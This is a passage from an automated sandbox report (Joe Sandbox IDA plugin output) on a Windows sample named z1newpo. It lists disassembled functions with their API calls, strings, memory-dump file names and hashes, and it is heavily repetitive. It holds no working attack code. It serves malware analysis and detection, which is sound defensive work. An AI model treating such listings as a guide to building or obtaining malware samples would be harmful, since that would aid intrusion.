                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                    Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                    • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                    • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                    • String ID:
                                                    • API String ID: 3771399671-0
                                                    • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                    • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                    • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                    • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                    Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                    Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 0-1603158881
                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                    Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateMenu.USER32 ref: 00448603
                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                    • IsMenu.USER32(?), ref: 004486AB
                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0
                                                    • API String ID: 161812096-4108050209
                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                    Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                    • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                    Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                    Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                    • String ID:
                                                    • API String ID: 978794511-0
                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                    Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                    Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                    Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memcmp
                                                    • String ID: '$\$h
                                                    • API String ID: 2205784470-1303700344
                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                    Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                    Strings
                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                    • API String ID: 2441338619-1568723262
                                                    • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                    • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                    Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID: @COM_EVENTOBJ
                                                    • API String ID: 327565842-2228938565
                                                    • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                    • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                    Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                    • String ID: H
                                                    • API String ID: 3613100350-2852464175
                                                    • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                    • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                    Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                    • String ID: close all
